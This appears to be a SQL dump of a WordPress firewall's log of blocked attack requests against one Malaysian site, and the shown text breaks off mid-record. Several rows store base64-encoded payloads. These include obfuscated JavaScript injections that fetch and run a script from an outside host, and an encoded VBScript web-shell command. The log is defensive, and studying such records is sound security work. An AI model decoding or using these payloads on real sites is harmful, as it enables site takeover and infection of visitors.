qLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37839,1569950027.290410,1569950025.831500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37840,1569950022.255821,1569950021.028400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37841,1569950020.018335,1569950019.029000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37892,1570544578.563520,1570544577.684000,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//dxyylc/md5.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9keHl5bGMvbWQ1LmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37842,1569950018.322371,1569950016.764300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37843,1569950016.046831,1569950015.196900,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37702,1569411853.653580,1569411852.712100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37958,1571333900.423392,1571333899.411800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37957,1571333902.615481,1571333901.532600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37956,1571333905.573358,1571333904.616000,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37998,1571334732.231947,1571334731.365700,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF8wOHE3NW53NjFjYzZheGs2OD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2psNDk0ajZiOTdteGo0anJ6Ki8sMTE2LyoqLywxMTYvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExMi8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTE1LypfMmp4NWF2dnk4OGYzdW84aGoqLyw1OC8qX2psNDk0ajZiOTdteGo0anJ6Ki8sNDcvKl9iM2pmc2dhYTlyejd2a2lwNiovLDQ3Lypfamw0OTRqNmI5N214ajRqcnoqLyw5OS8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTAwLypfMmp4NWF2dnk4OGYzdW84aGoqLyw0Ni8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTEyLypfMDhxNzVudzYxY2M2YXhrNjgqLywxMTQvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDEwNS8qX2psNDk0ajZiOTdteGo0anJ6Ki8sMTE4Lypfamw0OTRqNmI5N214ajRqcnoqLyw5Ny8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sOTkvKiovLDEyMS8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sMTA4LyoqLywxMTEvKiovLDk5Lypfamw0OTRqNmI5N214ajRqcnoqLyw5Ny8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sMTE2LyoqLywxMDUvKl8wOHE3NW53NjFjYzZheGs2OCovLDExMS8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTEwLypfamw0OTRqNmI5N214ajRqcnoqLywxMDIvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExMS8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTE0LypfYjNqZnNnYWE5cno3dmtpcDYqLywxMDgvKl9qbDQ5NGo2Yjk3bXhqNGpyeiovLDExMS8qX2psNDk0ajZiOTdteGo0anJ6Ki8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl8wOHE3NW53NjFjYzZheGs2OCovLDQ3LypfMDhxNzVudzYxY2M2YXhrNjgqLywxMTYvKl9iM2pmc2dhYTlyejd2a2lwNiovLDk3LyoqLywxMTIvKiovLDExMi8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTAxLypfYjNqZnNnYWE5cno3dmtpcDYqLywxMTQvKl9iM2pmc2dhYTlyejd2a2lwNiovLDQ2LypfMDhxNzVudzYxY2M2YXhrNjgqLywxMDYvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExNS8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sNjMvKl8wOHE3NW53NjFjYzZheGs2OCovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8pO3ZhciBfYjNqZnNnYWE5cno3dmtpcDYgPSBfMmp4NWF2dnk4OGYzdW84aGooXzA4cTc1bnc2MWNjNmF4azY4KTtpZihfYjNqZnNnYWE5cno3dmtpcDYubGVuZ3RoID4gMyl7X2wxbjRxNm9tdjBjZ2lnbjdoKF9iM2pmc2dhYTlyejd2a2lwNik7fSBmdW5jdGlvbiBfMmp4NWF2dnk4OGYzdW84aGooX21iNDYza3ptc2U4cmw4bWszKXsgdmFyIF9qbDQ5NGo2Yjk3bXhqNGpyeiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19qbDQ5NGo2Yjk3bXhqNGpyei5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX21iNDYza3ptc2U4cmw4bWszLCBmYWxzZSApO19qbDQ5NGo2Yjk3bXhqNGpyei5zZW5kKCBudWxsICk7cmV0dXJuIF9qbDQ5NGo2Yjk3bXhqNGpyei5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9sMW40cTZvbXYwY2dpZ243aChfN2oxZGEzM204eWY3eDF1eXcpeyB2YXIgXzgwanEyYW5udjEwZTdtMjlqID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfN2oxZGEzM204eWY3eDF1eXcrJyByZXR1cm4geCt5OycpO184MGpxMmFubnYxMGU3bTI5aigwLDApO308L3NjcmlwdD48c3R5bGU+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37955,1571333907.784561,1571333906.661100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37954,1571333911.214446,1571333908.853600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37953,1571333913.731826,1571333912.616600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37997,1571334734.195857,1571334732.924900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37952,1571333915.903556,1571333914.848800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2ZwdjZ0NzNibzF5dT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2Z4NG9zbTVpdGNkcyovLDExNi8qKi8sMTE2LypfZWViNXdpcjRzZ3k5Ki8sMTEyLypfejR1bnd2ZGdxcnZxKi8sMTE1LypfZWViNXdpcjRzZ3k5Ki8sNTgvKl9meDRvc201aXRjZHMqLyw0Ny8qX3o0dW53dmRncXJ2cSovLDQ3LypfZng0b3NtNWl0Y2RzKi8sOTkvKl9mcHY2dDczYm8xeXUqLywxMDAvKl9lZWI1d2lyNHNneTkqLyw0Ni8qX3o0dW53dmRncXJ2cSovLDExMi8qX2ZwdjZ0NzNibzF5dSovLDExNC8qX2VlYjV3aXI0c2d5OSovLDEwNS8qX2Z4NG9zbTVpdGNkcyovLDExOC8qX2Z4NG9zbTVpdGNkcyovLDk3LypfZnB2NnQ3M2JvMXl1Ki8sOTkvKiovLDEyMS8qX2VlYjV3aXI0c2d5OSovLDEwOC8qKi8sMTExLyoqLyw5OS8qX2Z4NG9zbTVpdGNkcyovLDk3LypfZWViNXdpcjRzZ3k5Ki8sMTE2LyoqLywxMDUvKl9mcHY2dDczYm8xeXUqLywxMTEvKl96NHVud3ZkZ3FydnEqLywxMTAvKl9meDRvc201aXRjZHMqLywxMDIvKl9lZWI1d2lyNHNneTkqLywxMTEvKl9mcHY2dDczYm8xeXUqLywxMTQvKl96NHVud3ZkZ3FydnEqLywxMDgvKl9meDRvc201aXRjZHMqLywxMTEvKl9meDRvc201aXRjZHMqLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qX2ZwdjZ0NzNibzF5dSovLDQ3LypfZnB2NnQ3M2JvMXl1Ki8sMTE2LypfejR1bnd2ZGdxcnZxKi8sOTcvKiovLDExMi8qKi8sMTEyLypfZnB2NnQ3M2JvMXl1Ki8sMTAxLypfejR1bnd2ZGdxcnZxKi8sMTE0LypfejR1bnd2ZGdxcnZxKi8sNDYvKl9mcHY2dDczYm8xeXUqLywxMDYvKl9lZWI1d2lyNHNneTkqLywxMTUvKl9lZWI1d2lyNHNneTkqLyw2My8qX2ZwdjZ0NzNibzF5dSovLDEwOS8qKi8sNjEvKiovLDEwOS8qX3o0dW53dmRncXJ2cSovKTt2YXIgX3o0dW53dmRncXJ2cSA9IF9lZWI1d2lyNHNneTkoX2ZwdjZ0NzNibzF5dSk7aWYoX3o0dW53dmRncXJ2cS5sZW5ndGggPiAzKXtfcnR5cGYzc2t2ZmlpKF96NHVud3ZkZ3FydnEpO30gZnVuY3Rpb24gX2VlYjV3aXI0c2d5OShfcHN3OTF1cTJua3ZpKXsgdmFyIF9meDRvc201aXRjZHMgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfZng0b3NtNWl0Y2RzLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfcHN3OTF1cTJua3ZpLCBmYWxzZSApO19meDRvc201aXRjZHMuc2VuZCggbnVsbCApO3JldHVybiBfZng0b3NtNWl0Y2RzLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX3J0eXBmM3NrdmZpaShfZWMycTMyenNkcmwzKXsgdmFyIF9mN3M1YWQ4ZTFrdjkgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF9lYzJxMzJ6c2RybDMrJyByZXR1cm4geCt5OycpO19mN3M1YWQ4ZTFrdjkoMCwwKTt9PC9zY3JpcHQ+PHNjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37982,1571334719.339622,1571334718.260800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgXzc2cm9vcjhjYWI3bDNlYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qXzhsN3FzZjN3bTl0MWNxMyovLDExNi8qKi8sMTE2Lypfc3ZuMjl4eHdteXRzeGIwKi8sMTEyLypfbnE4eXMzNXJoOGp4a2xwKi8sMTE1Lypfc3ZuMjl4eHdteXRzeGIwKi8sNTgvKl84bDdxc2Yzd205dDFjcTMqLyw0Ny8qX25xOHlzMzVyaDhqeGtscCovLDQ3LypfOGw3cXNmM3dtOXQxY3EzKi8sOTkvKl83NnJvb3I4Y2FiN2wzZWEqLywxMDAvKl9zdm4yOXh4d215dHN4YjAqLyw0Ni8qX25xOHlzMzVyaDhqeGtscCovLDExMi8qXzc2cm9vcjhjYWI3bDNlYSovLDExNC8qX3N2bjI5eHh3bXl0c3hiMCovLDEwNS8qXzhsN3FzZjN3bTl0MWNxMyovLDExOC8qXzhsN3FzZjN3bTl0MWNxMyovLDk3LypfNzZyb29yOGNhYjdsM2VhKi8sOTkvKiovLDEyMS8qX3N2bjI5eHh3bXl0c3hiMCovLDEwOC8qKi8sMTExLyoqLyw5OS8qXzhsN3FzZjN3bTl0MWNxMyovLDk3Lypfc3ZuMjl4eHdteXRzeGIwKi8sMTE2LyoqLywxMDUvKl83NnJvb3I4Y2FiN2wzZWEqLywxMTEvKl9ucTh5czM1